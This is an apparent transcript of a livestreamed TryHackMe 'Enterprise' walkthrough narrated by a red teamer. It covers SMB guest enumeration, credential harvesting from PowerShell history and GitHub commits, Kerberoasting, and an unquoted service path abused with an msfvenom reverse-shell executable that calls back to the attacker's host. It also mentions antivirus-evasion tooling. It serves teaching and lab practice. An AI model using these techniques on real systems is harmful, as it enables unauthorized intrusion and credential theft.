Thanks for the 100 Sigil Biddies, Oreobite. And yeah, absolutely. It's super common to see, oftentimes, like some clients won't have any antivirus at all. And that's super common. I would say that's super common. Or they may have antivirus on Windows 10, but they'll have legacy hosts like Windows 7 and Windows Server 2012 that won't have antivirus installed on them. That's super, super common, yeah. B7H30, thank you so much for the raid, by the way. Welcome to your viewers. Yeah, it's LDAP. 389 and 636 are LDAP. Oftentimes, if you see these ports open, you're also dealing with a domain controller. This is so this is very, very likely a Windows domain controller. Another way you can tell is port 53. And I know what you're saying, Mr. Streamer. Mr. Streamer, I was told that that DNS works on port 53 of UDP, which is true. It does, but it uses port 53 TCP for some things, including zone transfers and so on. So DNS technically runs on both UDP and TCP. How long have you been doing red teaming? I've been on a red team since 2019. Since 2019, I got on my first official red team. I'd done red team assessments before that, but I was just a more generalized penetration tester. But since 2019, I've been on specifically red teams. Okay, so let's go at, we see a lot of stuff. So the first thing we're going to want is CrackMap exec. CrackMap exec tech H. Keep in mind, this is a new Kali installation. So CME, this is the first time I've used it. On this particular host. SMB. Was port 80 open? I didn't even look. Port 80 is open. So let's take a look at port 80 really quick. (1010) 209 145. Enterprise domain. Oh, chat. You hate to see it. They're asking us nicely to we get all this stuff spun up. We get all this stuff spun up, and then we browse to the web page and it says keep out. Well, I guess we can't hack it now, chat.
They ask you how you are, you just have to say that you're fine when you're not really fine, but you just can't get into it because they would never understand.
We'll just leave. Sorry to bother you, Mr. Domain Controller. We could get in trouble. That's true. We could indeed get in trouble.
FBI, open up!
How long have you been doing security in general? I've been in cybersecurity since 2013. 2013 is when I first started my cybersecurity career. I worked for the Air Force then. Another thing to note from our... What are some other important things to note for our Nmap output here? And keep in mind, a lot of this is coming because we did the TAC SC for default scripts. I always recommend running that one because you get good information like this. We get the machine's name is Lab Enterprise. The computer name is Lab DC. The full domain name appears to be lab.enterprise.tryhackme. So the fully qualified domain name of the machine is going to be labdc.lab.enterprise.tryhackme. This is really important stuff. A lot of times, this is really important stuff to remember for Windows, okay? Windows, a lot of times, doesn't like IP addresses. Windows wants to operate with host names. So a lot of times, if you're running an exploit in Windows, or if you're running enumeration in Windows, you really need to have, you need to know the domain name, you need to know the NetBIOS name of the computer. It won't take just the IP address. It just won't. Windows prefers using host names. So let's go ahead and copy all this down. Okay, so we copied that down. Now we're going to use CrackMap exec here. Let's first do vim sudo vim etc hosts. We can go ahead and delete this. We can do 10.10.209.145. It's going to be enterprise. And we'll make sure to copy in all of these other things. That should be fine. Okay, so let's do crackmap exec SMB lab DC. By the way, Kerberos especially. If you're interacting with Kerberos hates IP addresses, kids. Kerberos hates IP addresses. You have to use host names with Kerberos. Let's just send crackmap exec at it and see what crackmap exec gets for us. And we see it's able to connect. It says it's Windows 10, build 17.763, 64-bit. The name is labdc, and the domain is lab.enterprise.tryhackme. We do see that SMB signing is set to true, which is very common, which is default for domain controllers. So domain controllers will be signing SMB messages, so we probably can't do any kind of NTLM relaying or anything like that, which is not likely to be the case inside of a CTF in the first place. So we can try for some null sessions first. That means logging in with no username and no password. Let's do Stream Raiders really quickly. Do you use a custom tmux config? I do. I use omytmux, GitHub, omytmux. If you just search for omytmux and GitHub, you will find what I'm using to get my tmux to look that way. I still want to customize the colors a little bit more than I have. SMB will default to unsigned if not configured correctly, just a thought. Yeah, it will, except for domain controllers. Domain controllers always have SMB signing set to on, by default. We're just waiting for our brave warriors here to clap the cheeks of these green guys. Clap them cheeks. Clap them cheeks. What was your hardest lab at Hack the Box? Like the hardest machine? Probably CrossFit 2. CrossFit 2 twisted my fucking titties, dude. Blue. Blue is literally just eternal blue. It's the easiest box on there, probably. I don't know. One of the insane boxes. Actually, you know what? It was definitely Player 2. It was definitely Player 2 because I never could get that heap overflow to work. I eventually got root through a different means. But there's supposed to... The intended path to root is through a heap overflow, and I could not get it to work. All right, so we tried the null session. It doesn't work. No null session. We can also try the guest account. And looky there. This is also pretty common. We can't, based on this little green plus sign, we can authenticate to the box with the guest account and no password. That's pretty common. Mr. Solomon with the 300 Seagull biddies. Thank you so much, my friend. Chiaz, Gene Mail, Rickard Skytrain, Dan Rog. Thank you all for the follows. Cthulhu Fountain to you, my friend. So, what can we do now? What do we do from here? Well, first, what I'm going to do is I'm going to go buster the webpage. Because keep in mind, you do want to have a suitably large penis. And part of that is making sure you have automated recon going while you're doing manual recon. So we're going to go ahead and go buster this web server just in case. See if it finds anything while we enumerate SMB. Unable to connect. Oh, it's HTTP. So we can authenticate to this machine. What's the first thing you want to do, chat? Yeah, we could SMB client. The first thing is the best thing is probably to do tac shares to see what shares we have access to. So let's check that first. What file shares are available? Alas. Oh my goodness, they're asking us so nicely, chat. That I feel like we're gonna have this happening.
FBI, open up!
They're coming for us, chat. What other? Oh, so we can read from the user's share. That's awesome. And this is actually pretty common, by the way. If you just set up, I don't know if you've ever set up a file share in Windows, but if you just share a file inside of the users folder, I find that you can't get Windows to share just that file. Instead, it'll share the entire users folder for some reason. And I don't know why it does this, but it's very annoying. In order to share just a different file or folder, the folder has to be outside of the users share, or the users folder for some reason. So the sysvol share is something you see on domain controllers. It's something you see in Active Directory. You see that, guys, all the time. We see also a docs share, which is highly interesting. And we see this IPC dollar. This IPC dollar is a default share. But if we have read access to it, there's a couple of things that you can note. You can do what's called an RID brute force to get all of the usernames on the box. So we're going to just do a full username enumeration on this box. Now, what is an RID? Let me point it out to you. We just see an example of one. Here we go. So this is a security identifier in Windows. In Windows, every single account, every single object in Windows is identified by one of these. Oh, thank you for the bless you. This is called a security identifier. This is the domain identifier right here. And this last little number right here, this is the RID, the relative identifier. What you're noticing about the RID is that it's small. And thus, we can actually request information on all of these different SIDs, just incrementing this last number a little bit, and enumerate all of the users and groups. Does that make sense? So, like, this one had RID 1000, ATL Bitbucket. ATL at 1001 was lab DC dollar. This is the actual machine account. Does that make sense? You can do that if you have read access to the IPC dollar share. We also had that docs share, so let's check that out. SMB client. We're learning all kinds of shit about Windows today. Docs. Attack you guest. And then we put in no password. And we can read this share. And we see RSA secured credentials and RSA secured document. We can get star. Oh, I'm in the get. Let's just I guess we have to do mget star, I think. Yes. And yes. Okay? So we got those. Let's take a look at those. Let's move these to... Is it going to tell us, I wonder? Yeah, it's encrypted. These are encrypted. Yeah, so we would have to crack these. Is there an MS Word to John? I need to get a hash out of this. So we'll see if we can find... We need a way to get a hash out of them. Office to John. There it is. Okay, so... Python 3. This... must be Python. What does it want? Oh, it just wants me to put the file name, I guess. Let's do secure document. Okay, there's the doc.hash. And credentials.hash. And this will be excel.hash, I guess. Okay. John, tac word list. We'll do excel.hash. So there we go. We'll see if that cracks. Yeah, there might be something useful in the structure. .document files, this X, by the way, if you're wondering what this X in .docx means, it stands for XML. It means that the document is actually a zip file, or it's not technically zip, it's something very similar. It's technically a zip that contains a whole bunch of XML that actually contains the data about the document. But I don't think I'm not gonna, there could be something interesting in there, I guess. We're not getting anything with GoBuster, are we? I just don't want to tunnel too hard on one thing. There's other things for us to look at. The whole user share is very interesting to me. Yeah, I don't know how to extract it on Linux. Extract the data. Oh, just name it. Just rename it to zip. Open the portfolio.zip file with Archive Manager. Do I have Archive Manager on here? Let's find out. I do not have Archive Manager on here. It's fine. We'll come back and look at that if we don't find anything else. I just don't want to tunnel on the same thing for too long here. There's other stuff that we haven't looked at yet. Okay, so that's cracking. So there was SMB client. There was the user's share that I want to look at specifically. Okay. That would work if they weren't encrypted, I think. I think that probably would, yeah. I think you're probably right about that. Okay, so we do see some stuff here. Let's see if we can... I don't suppose we can just access the administrator. Yep, can't do that. So Bitbuck is interesting to see. Default user. Let's do lab admin. Okay, we can see into this directory. Let's check documents. Nothing. Let's check downloads. Nothing. Let's check public. Nothing there. So, interestingly, we can read lab admin, but we cannot read anything else. We can't read any of these others. Which box is this one? This is Enterprise on TryHackMe. Is anyone confused? Before I continue, is anyone confused about any of the stuff that we've done so far? Is anyone confused about any of that stuff? There could be app data. We can only see into lab admin. Was there an app data folder in here? Oh, there is an app data folder. App data is usually huge. This folder is massive. Where do they store those PowerShell stuff? One of the things to look for in app data is PowerShell related. PowerShell logs are stored there. Credentials. This is probably DPAPy stuff, but there's nothing stored there. That's where you'd find the data protection API's stuff. PowerShell. PS read line. I know that they do put, yeah, okay, there you go. Good call. Whoever said app data, good call. Because we have the PowerShell console history here. Good call. Always something to look for. It's not common to see get to compromise users. If you know if you're on like a developer box, if you've compromised a developer machine or something, it's always a good idea to look for the PowerShell log. Always a good idea. Okay, what do we have? Ooh. Some fine additions to our collection there, chat.
A fine addition to my collection.
Okay. So, many of you in chat are like, I can just see it. Many of you in chat are like, Mr. Streamer! How is it that there just seem to be credentials in clear text just lying around everywhere? My dude. This is so common. It's actually gross. This is actually so common, it's disgusting. It's actually the most realistic thing you're going to find on TryHackMe or Hack the Box is people with credentials in clear text. Credentials in clear text just being stored in shares. I mean, just recently, we were red teaming a fairly robust environment. Their EDR was installed everywhere. They had Splunk that was listening. They had all kinds of shit. Very robust environment. We're talking Microsoft Defender for Endpoint. We're talking Splunk. We're talking a dedicated blue team that's looking for us. And you know how we got domain admin, chat? Because, well, on the server we were on, we had people logging into it, and I used Rubius to dump the ticket of one of the devs. One of the IT, it's probably a solutions architect or something, someone not too technical, logged into the server. We got his ticket, and we used that ticket to access a file share on a different machine, and that file share just had an Excel document full of everybody's passwords in clear text. I'm not kidding. This was a very robust environment, and we just accessed a file share where there was an unencrypted Excel document with all of their with the accounts. It was an Excel document that contained information on accounts they had made recently. It was keeping track of accounts they had set up for users and for themselves, and there were admin accounts in there. And I'm telling you, finding clear text credentials, we'll spend days on a network just looking through file shares, because on a network of any decent size, there are huge share drives full of terabytes of files, and we'll spend whole days going through these drives looking for credentials, and we almost always find them. I'm telling you, you find them. I'm telling you, clear text credentials in files is super common to see. So we have something here. We have some credentials here. Seems like something that would be easy to detect. Not allows me to laterally move. Seems like something. How is it easy to detect? We're viewing a file share. How often do you think in one day? How often do you think in one day users view file shares? How often do you think in one day does a user authenticate to a file share? Dude, dozens, hundreds, thousands of times a day on any network of any reasonable size. File shares are being viewed by users. You can't see that. You're not going to see the red team looking at file shares. 0 out of 10 chance you're going to catch that. Unless you have some really strong baselining. You'd have to have some really strong network baselining to be able to detect, like, specifically a file share authentication from one server to another server as a specific user. That'd be very, very bizarre. I've never seen that. It is very stealthy to browse file shares. Now, you will sometimes encounter shares that are set up purely for honeypots. You do find that. I have found that in 2 different occasions, 2 separate companies. I've had companies, the company has set up files, dummy files that look really juicy, and if anybody accesses them, they throw an alert. Like files like credentials.xls or something like that. You do see that. Robust blue teams will play those kinds of games. So you do need to watch out for that. But I'm telling you, it's not very common. It's not very common. How would you tell if you're in a honeypot? You often can't. If I could tell you, you just be wary of super juicy files just kind of sitting out in the open. Nudes.txt gets me every time. So we could do crackmap exec again. Let's go back to the stream here. Crackmap exec SMB lab DC. And the user is going to be replication. I'll tell you what, chat. Why might the name replication make me excited, chat? I'm not saying this is the case. I'm saying if I was on a real-world network and I got access to a user that was just called replication, I would get erect. Does anybody know why? DC sync. I would be immediately thinking, can that account DC sync? If that account can DC sync, that domain is as good as owned. It's done. My assessment is done. Whoops. Now, it doesn't mean necessarily we can't... Is DC sync not quite noisy? It is. Yeah, unless you get unless you remote into the domain controller first, and then you DC sync locally. If you DC sync the domain controller locally, it's much quieter. But honestly, a lot of times, the only EDR that I've come across that will definitely detect DC sync in a lot of cases is Microsoft Defender for Endpoint. The rest of them don't detect it by default, I don't think. Unless the blue team configures them. So we'll see if we have credentials here. Interesting, we get logon failure. Did I copy the credentials correctly? Replication. 101 rep admin 123. That does seem to be the correct credentials. That does seem to be the correct credentials. So there must be another login prompt then. If these credentials don't authenticate to the machine directly, we looked at, we did a full RID brute force. So let's see if there's a replication user on the box. I can't remember what, here we go. Is there a replication user here? Yeah. There is a replication user. But this password does not seem to work. If you're seeing something that I don't see, chat, let me know. I'm just making sure I spelled everything correctly. You try WMI exec. Well, it doesn't matter if WMI exec is going to work or not. If we can't authenticate to this machine, which we apparently cannot. So there must be another login portal. Was there another port open that I didn't see? Or that I did not investigate? I do see 5357 open. But that's the HTTP API. I don't think that there's anything there. But we can look anyways. Service unavailable. Okay. We have 17877, but I think that is a normal... That is one of the high ports that this kind of crap is going to have open. Are there any other web servers open that I didn't see? There must be somewhere to use these credentials. These credentials cannot be an accident. And if we can't authenticate to the machine directly, there must be some kind of web portal. Let's do an all port scan just to be safe. Look at the PowerShell history again. Okay. I can definitely do that while the Nmap scan is running. So we see private.txt. We see an IP address that I don't think actually exists. Yeah, I got the credentials correct. Wildagar, my goodness. Bringing us 5 new cult initiates. First one is to a Japanese name that I cannot pronounce because it's in kanji. Regis Philben, Bonos Tech, Tapone, and Versi. With the, welcome to the All Has Red team. Thank you so much, Wildagar. That is so kind of you. Thanks for supporting the stream. Carpe DM, Skull and Pones, Skynister, the James HD, Goggins, and Check the Riddler. Thank you for the follows. Hack the 3389. We can't, these credentials, if they can't authenticate to SMB, they're not going to be able to authenticate to 3389. There must be, if this credentials don't work on the machine, there must be some kind of other web portal open somewhere. 5985 is WinRM. This is one of the standard high ports that Windows always has open. Yeah, WinRM is open. But, again, we're not going to be able to authenticate to it. But we'll give it a shot. I will give it a shot. Just for you, chat. If we can't authenticate to SMB, it means these credentials don't work for the machine. So we're not going to be able to authenticate to any of the other Windows services either. We need to look for web services. But we can try it anyways. We could try WinRM. So we can't authenticate there. Oh, you know what we could do? Oh my goodness. How silly of me. How silly of me, chat. My goodness, chat. What are you even doing? You're allowing me to go this long without a username list, and I did not even AsRep roast. What the fuck am I thinking? We have to AsRep roast, chat. We have to AsRep roast. Let me just copy these users in here. There we go. And I'm going to explain what AsRep roasting is. Don't worry.
What are you doing, step bro?
Fair enough. You may what are you doing step bro me. Okay, so first we just need a list of the usernames. So we're going to use... let's do %s. Or I don't want to do insert. %s to apply the whole document. And we'll look for... like that. Replace it with nothing, and then G. I messed it up. Oh, because that was a backslash that I put in there. It's %at. Let's just uppercase it. We'll have to do that. And then replace it with nothing, and do that. And now we'll just replace everything after a space. So, %s. We're just doing a little Vim magic. Don't be alarmed. There we go. So I just need a list of usernames. Password policy exemption. That's weird. And now I need curb root. So let me find curb root really quickly. Yeah, we have a number of things, a number of interesting things, but we want Kerberoot. So what is ASREP roasting? So this is a Kerberos-based attack. I just want the release. This is a Kerberos-based attack. We want Linux AMD 64. Okay, save file. Sudo move. Mcdir. Okay. There we go. Alrighty. So we're going to Kerberoot. So this is a tool for brute forcing Kerberos, for Kerberos exploitation. So what is ASREP roasting? ASREP roast is exploiting a misconfiguration in Active Directory called Kerberos pre-authentication disabled. Kerberos pre-authentication means that in order to request a ticket, you need to first send your username or password to the machine. If this is enabled by default for obvious reasons. So you first need to send the key distribution center your username or password in order to get a ticket. But there is an option to disable pre-authentication, which means that anybody who knows the username can extract a password from it, or extract a ticket. You can use Kerberoot for this, but I actually prefer to use get np users. It's going to be impacket get np users. I just figured if we're going to... Okay. Get np users is the one I usually use for this. We'll do tac request. Tac users file. This is an impacket script, so they are very particular about the way they want parameters to be. TryHackMe enterprise users.list. Tac DC IP is going to be this. I'll probably get this syntax wrong the first time. And then the target is going to be lab DC. The target, I don't think we don't actually need. We'll do lab DC. I don't think we need an actual user. See if that works. Domain should be specified. So it's going to be lab.enterprise.tryhackme is the domain. I did specify the domain. Let me just look in my cheat sheet here. This cheat sheet is available on my Patreon. If you do want this, let's see. Is it under Windows? Or no, it's under Tools and Impacket, I think. Impacket. Oh, come on. Where's ASREP roasting? I don't have ASREP roasting in here. Damn it. Just look up examples. Get NP users examples. Impact is very particular about how it wants its... Oh, it wants a slash after... For fuck's sakes. Every time, dude. See, it wants this slash here. Okay. So we're gonna see if we get any hashes here. We got no hashes. Damn it. We have a list of users, but no hashes. Damn it, I thought this was actually work. I thought that would actually work, son of a bitch. Did we get anything new from here? Anything we didn't look at? These all we saw. That's a high port. We don't care about that. That's WinRM. Another random high port that Windows uses. 7990? The hell is 7990? Did we have 7990, chat? No, we did not. That's a new port. Let's check that out. This is why you always run an all port scan. Always you should run an all port scan. You should always run an all port scan. So let's go ahead and see what service is running here. Yep, we got John running to try and crack the Excel document, but it doesn't look like it's cracking. So my guess is it won't crack. It's another web server. See? There we go. Now we're cooking with some amount of gas. So http://. So there's a web server we haven't looked at on a weird port. Damn it. Stupid Firefox. Oh, shoot. Okay. Oh, a reminder to all enterprise employees, we're moving to GitHub. Enter email. admin@enterprise.tryhackme. That doesn't appear to do anything. Continue with Microsoft. Or that's going to want to log into... All these links don't seem to actually do anything, by the way. So it seems to be indicating they want us to look at GitHub. So let's go to GitHub. We can search for enterprise. We get a lot of crap, obviously. Enterprise.tryhackme, perhaps? We do have one user. Enterprise.tryhackme. The latest and greatest company on the New York Stock Exchange. Okay. Repositories. About us. Nothing. So we do have something. There is something on GitHub here. We have a people. Nick Enterprise Dev. That sounds good. Management script.ps1. Yeah, that sounds pretty good. That sounds pretty nice. Take a look here. Alas. Now, why would they do this, chat? Why would they do this to us, okay? Listen. They would send us to... They send us to GitHub, and they give us a they give us a management script, systeminfo.ps1, where it has fields for username and password, and we can't even there's not even any credentials.
They ask you how you are, you just have to say that you're fine when you're not really fine, but you just can't get into it because they would never understand. Okay, chat's already ahead of me on this, okay? So GitHub, the whole point of Git is to maintain a history of the a history of this code. So let's look in the commits. Two commits.
updated things, and this is when it was originally created. My goodness. So how often do you think this happens, chat? Because I know some of you in chat are like, surely, Mr. Streamer. Mr. Streamer. Surely nobody would be so dumb as to leave credentials in a public GitHub server. Dude, this happens so often, it's disgusting. This is so realistic, it's insane. Every time I pen test or red team anything, the first thing I'm doing is looking to see if they have devs on GitHub that I can see. And I'm going to browse through their repos to look for credentials. Every single time. This is so common. So common.
A fine addition to my collection.
Okay, we're just going to paste those in there. So Nick apparently is a toasty boy. He is a very toasty boy. See if we can authenticate with those credentials. And alas, now we can authenticate. Now when you get your first set of credentials, this is a very magical time, okay? This is a very important time. When you get your first set of valid credentials on a domain, okay? Very, very important time. What should you be immediately thinking, chat? Yeah, it's time for Kerber roasting. It's time to well, let's first see if we can have WinRM access with these credentials. Let's first see. Let's see if we have that. We could also try to log in with a remote desktop. That's not what I mean. We don't have WinRM access. But the first thing you want to be worrying about is there are two things. You want a Kerber roast and you want Bloodhound. We're going to Kerber roast first. So what is Kerber roasting? Kerber roast is distinct from ASREP roasting. These are different things, okay? So Kerber roasting exploits just how Kerber roast works. So on any Windows network, you're going to have accounts that don't have users behind them. So users aren't going to be there to log in and put their passwords in and all this good stuff. Instead, I mean, those are called service accounts. They're accounts for various services. MSSQL often has a service account associated with it. And these accounts will have what's called a service principal name attached to them that uniquely identifies that service on the domain. Why is this relevant? Because if you know the service principal name of any service, you can request a ticket for that service. Okay? And that ticket is encrypted with the password that's of that service account. So those tickets can be cracked for more credentials. So Impacket has another script for this. Get user spins. And let's see if I can get it right this time. Attack DC IP. ASREP roasting didn't work, but let's see if Kerber roasting does. Let's do TAC request because we want to request the tickets. As well as get user spins is just SPN, service principal name. Get user spins by default will just get the names of the services. If we do TAC request, it'll request tickets for each of them. And you can request a specific user as well if you want, but we're just going to request all there's no reason to hold back in this situation. I think that's fine. And then we can put, it's going to be lab.enterprise.tryhackme/Nick. Because you need to have credentials to do this. You must have valid domain credentials to do this. And looky there, chat.
Nice.
Nice. All right. We've got some credentials for the Bitbucket user. Or we got, this is a service ticket. This is a hash of a service ticket that can be cracked with John. John can crack this. Let's kill this. I don't think it's going to find it. Vim bitbucket dot hash. Paste that in. John bitbucket dot hash. And let's see if it cracks. And it cracks immediately. Little red bucket. Little red bucket. So let's put that down. Okay. Does anybody have any questions about that? That's a stupid question. I'm sure you're gonna have many questions about what just happened there. Is there anything that I can particularly elucidate for you? TryHackMe equals CTF sort of thing? Yeah, it's a CTF thing. So for these attacks, you rely on poor password complexity. Yes. Yes. On any Active Directory domain out there, you're going to be able to do what I just did. If you have credentials. You're going to be able to pull all the service tickets and try to crack them. The security of those service tickets relies on that the credentials are hard to guess. Okay? How did you get from Nick to the Bitbucket user? Good question. We just so if you have any credentials on the domain whatsoever, you can do what's called a Kerberos attack, which we did right here, and pull the service ticket for the Bitbucket service. So let's try and authenticate with these new credentials. Password is going to be Little Red Bucket. We cannot authenticate with WinRM. Let's see if we can authenticate with SMB. We can. And so I think now is a good time to try RDP as well. Let's try Nick. Nick has an actual user account, so it's more likely that let's try an RDP in. Post connect failed, so it looks like that doesn't work. Let's try Bitbucket. And there we go.
Hackerman.
I'm in. All right. So we're in as the Bitbucket user. Okay, some crap happened. And we have our first flag here. Any questions about that, chat? So from here, the first things we're going to want to try. I want to see if Windows Defender is active. It is not. So Windows Defender is not active. Real-time protection is off. So I can do whatever I want. I want to see you put in the flag. I better reset the box time anyways while I'm at it. There we go. You got to get that dopamine rush of putting the flags in, right? Okay, I did all of that. User.text. There we go. Turn Windows Defender on for Give Me God of War mode. I can't turn it on. I'm not an administrator. I would turn it on. I really would. But I cannot turn it on if I'm not an administrator. Can you do a fast walkthrough of this box? Oh, God. We did a lot of stuff here. This is a lot of stuff. This is Enterprise on TryHackMe. You can do a Google to... I'm sure there are write-ups for this box available. Essentially, high level... we were able to access the box through the guest account with no password. And we were able to dump the PowerShell history, which had credentials in it. And I don't think those credentials actually amounted to anything. We found a web server open on a high port that we found later that directed us to a GitHub page. The GitHub page had credentials in it. Those credentials allowed us to use Kerberoasting to extract service tickets. We cracked one of those service tickets to get in with remote desktop here. That's essentially what we did. What do I want to do here? I like to run Power Up first. If Windows Defender is not active, I think we just run Power Up first before we run WinPeace. I like Power Up because it's quick and it often provides me quick ways of escalating. Let me see Empire's version. They might have a more modern version of it. It's in Empire. Server, I think. Modules. PowerShell. Privilege escalation. Privesc. Power up. Oh god, it's written in Python now. I just need the PowerShell version, man. Alright, I'll use the PowerSploit version. This is probably even older than the PowerSploit version, isn't it? Yeah, it is even older. Power up, GitHub. Raw. Okay. Come back over here. Pull down Power Up. Okay. We go back to free RDP. PowerShell. We can do some basic stuff first. Net user. Who am I /priv. We do not have SE impersonate privilege, which is always something to look for on Windows. Who am I /all should give me my groups as well. What groups am I in here? Remote desktop users. Password policy exemption. Oh, this just allows them to have that shitty little red bucket password. So that doesn't really give me anything, does it? Sensitive account. I might want to run Bloodhound to see what sensitive account means. So there's a group called sensitive account. And I'm curious why it's considered sensitive, but we're going to find out. So let's do IEX for invoke expression, IWR for invoke web request. We paste in the... Oh, that's not what we want. 10.2.54.81, which is my IP address. Powerup.ps1. Use basic parsing. Nothing matches the given URL. It's Linux is case sensitive, so power up. I spelled it. The casing is incorrect. Okay, so you might see that nothing happened. So what did it do? We just executed this script. That's just because we loaded it into memory, and now we have to actually invoke all checks to get it to actually run. So we'll see if PowerUp finds anything here. What's the free RDP syntax? Good question. We can look at that while PowerUp runs. So the free RDP syntax is /u for username, /p : for password, /v for the host that you're connecting to. You can also use rdesktop. Rdesktop is another tool that's built into Kali Linux specifically for that remote desktop. I use xFreeRDP because it allows you to pass the hash. xFreeRDP allows pass the hash. That's obviously not relevant here. But if you did only have a hash and not a password, that would be relevant. I get it. Okay. I see a priv-esque path, chat. Local system, huh? You don't say. 0 tier 1 service. So we see that PowerUp has flagged on this. What they've specifically flagged on is this. What's weird about this, chat? What's wrong with this line? Yeah, it's unquoted. It's unquoted. It's both unquoted and has spaces in it. So let me illustrate what I mean. Do a quick notepad stream. Okay? Okay. So, this is a quirk of Windows. It's been true of Windows from ever since the beginning, and it's still true now, and it probably will be true forever because Windows can never give up its backwards compatibility focus. But if you have a service name with spaces in it, you are supposed to put it in quotes. When you put the service in here. The reason is that without the quotes, Windows actually doesn't know where this path ends. This is the pathway to the executable for the 0 tier 1 service. When Windows goes to start up this service, it doesn't know where the path is by default. So it's going to go to this path, and if it's in quotes, it knows exactly where to look. If it's in quotes, like thus, it knows, oh, I'm going straight to this 0 tier 1 folder, and there should be an exe called 0 tier 1.exe in there for me to execute. No problems. But if there are no quotes, when Windows parses this path, it actually doesn't know where to stop parsing. So it exhibits very strange behavior with regards to these spaces. It does not know how to handle the spaces. This is kind of a quirk of, it's written in C. This part of the Windows operating system is written in C, and it does a really bad job of parsing these spaces. So what it's going to do is, it's going to look for a series of directories in sequence. And it's going to look for an executable that it can execute inside of those directories. So where's the first place it's going to look, chat? It's going to look in C. It's going to look there first for a program called program. Or more specifically, program.exe. In Windows, you can leave the .exe off. And like you can just type, if you just wanted to enter the command prompt, for instance, you could just do something like this and just do cmd and it'll open the command prompt. Or you can do cmd.exe. It doesn't matter, okay? Windows will automatically try to attack an exe onto the end for you. So it's going to look for C program.exe first. Where's it going to... because there's a space there. Where's it going to go next? If it doesn't find a program.exe, where's it going to go next? It's going to look there next. It's going to tack an exe onto the end. It's going to look for that. Or there's another space there. So it's going to be... It's going to look in program files for a file called this. Am I confusing myself again? Oh, yeah, I am confusing myself. You're right. It is going to look for files.exe. It's going to look for C program files.exe. I'm confusing myself again. My bad. My bad. It's been a long day. There we go. It's going to do that. Then it's going to go to the next space. It's going to look in C program files .exe. Does that make sense? It's just going to keep doing that until one of these files exists. So if C program.exe exists, it's going to execute that. If C program files.exe exists, it's going to execute that. This is the primary danger of a writable C drive. I see this very often on assessments where I'll be assessing a Windows machine and low-privileged users will be able to write to the C drive. As in, they'll be able to write to this directory right here. It looks like we can write to it. Can I just... I can't create a text document. I can only create a folder here. I can create a new folder. I can't create a... like an executable file here. So I see that fairly commonly. That's the primary danger. The primary danger is if you have like an unquoted service path or a DLL hijack or something like that, I could just slap program.exe into the C drive and it's going to execute. Does it process this path or does it look in the current working directory then path first? No, it does exactly what I'm showing you right here. It's going to try and parse this path. It's doing exactly what I'm going to show you, what I'm showing you right here. After that, it'll look for this. And so on and so on and so on until it reaches this whole path. And then it should find what it's looking for. Under normal circumstances, this is not a problem. But what if we can write to one of these directories and put a malicious 0.exe in there? Let's try it. Let's see if we can write to 0 tier. Let's see if we can do that. We usually can't write to program files, but we might be able to write to 0 tier. My goodness. We can indeed write to this directory, chat. So all we need to do is slap a malicious executable in there. start this service back up again or reboot the machine, and we've rooted this machine. So let's do that. We can use MSF Venom. We're going to want the 64-bit version. Um, 10.2.54.81. Local port equals 8443. Attack, the format is going to be exe. Output is Cthulhu.exe, or it's going to be 0.exe. Recall, the file must specifically be called 0.exe. What? Yes, I know. Say hi to the stream. This relies on Windows Defender being off. I mean, Windows Defender might catch our executable, sure. We just have to make sure that the executable that we put on disk doesn't get caught by Windows Defender. But in this case, Windows Defender is not active, so we can just put whatever we want there. Okay, go ahead. Let's kill this. Okay. Pull down 0.exe. wget http://10.2.54.81 0.exe taco 0.exe. dir, and we have 0.exe there. Sudo msfdb run. It's the first time I've run MSF console on this machine, so it's taken a second to spin up the database and so on. How do you usually bypass Windows Defender? I have a variety of tools that I would use to get past it. It often can be evaded just by changing a few signatures inside of the executable. In a situation like this, I'd run it through. I have a custom tool called Reanimator that I wrote that I would probably use. You could also use Scarecrow. Scarecrow would also do it. Show options, set payload, Windows, interpreter, reverse HTTPS. Oh, it's the 64-bit version. Set L host ton 0. Set local port 8443. Run. Okay. So SC stop 0 tier 1 service. We're gonna stop this service. SC start. Let's just make sure it got stopped. 0 tier 1 service. Why did that not work? Yeah, I might have to do it in CMD. That's right. You're absolutely right. I'm probably going to have to do it in CMD. PowerShell sometimes allows that kind of stuff and sometimes doesn't. Can I make this bigger for you? It does not look like I can make the font any bigger. I'm sorry. So SC stop Service has not even been started yet. Okay, so we can SC start. And there we go. The service is starting. And if we did this correctly, we should get an interpreter callback here. Looky there. All right, give it a second. It's taking a minute. And interpreter session 1 opened. You know, sex is great, but have you ever had an exploit work and see interpreter session 1 opened? Feels good. Feels good. And we can get UID. This is a slow interpreter shell. Yeah, HTTPS interpreter is quite slow. Oh, you know what happened? You know what happened, chat? Does anybody know what happened here? Indeed, no shells, no maidens. We are maidenless. We are maidenless. Interpreter died. It did die, but does anyone know why? Does anybody know why interpreter died? I know why it died. Yeah, perfidious reprobate is correct. I messed up, and I forgot that Windows is weird, and for whatever reason, has a special kind of executable for its service EXEs. MSF Venom TAC L formats. grep service. Windows has a specific format. Is it exe-tac service? That sounds right. We're going to check anyways. And I just forgot. If you do this, you will get the interpreter shell. It will come in, but it's going to die immediately because the service manager will kill it since it isn't a service exe. It does have a service exe, Husky. Don't worry. And it's not that bad to make it. In C#, you can whip together a quick service exe pretty easily. Okay, so we're just going to have to do all this again. My apologies. I made a mistake. But we do see that our exploit does work. Is it exe service? It was exe service, wasn't it? And I just wasn't paying attention. It is exe service. It's been a long day. I made a mistake. That is all. Mr. Hatads, Adani, Vashalu, Caramelo Wave, and GM Hikaru World Champion soon. Thank you for the follows. Cthulhu fought into all of you. All right, so there is our proper executable. And let's go back here to PowerShell. Let's just del 0.exe just to make sure there's no ambiguity. So we removed the old 0.exe. We wget the new one. SC stop 0 tier 1 service. SC start 0 tier 1 service. Oh, I forgot to run the... I made another mistake, chat. I'm sorry. Do I have to stop it now? Oh, there it goes. It's doing it. It's doing the thing, chat. Noob. Hey, it happens, my dude. I messed stuff up. We're all learning here, chat. And there's our interpreter shell, and I bet you this won't die. There we go. And we are in T authority system. And I started the service twice, so we'll get we have 2 interpreter shells just in case. So we can drop down into a shell here. And we have root.txt. All done. I am Groot. We did it. Let's do Stream Raiders really fast. Thank you for the 69 Tiggle Biddies orbital gun. We missed you putting it in. I'm so sorry, White Cyberduck. You're gonna survive, I promise you. Couldn't get harder right now? Dude, I know. Interpreter Session 1 opened is a wonderful thing to see. Also, new Cobalt Strikes, new Cobalt Strike beacons checking in. Also a great thing to see. Man, do we have enough people here? Oh god, we're getting divided. We're getting divided, chat. No, archers. Archers, no. Our archers went AWOL. Oh wait, they're just killing everything. Okay, never mind. The archers are actually just killing everything. Oh, nope. They can't kill the blue guys. 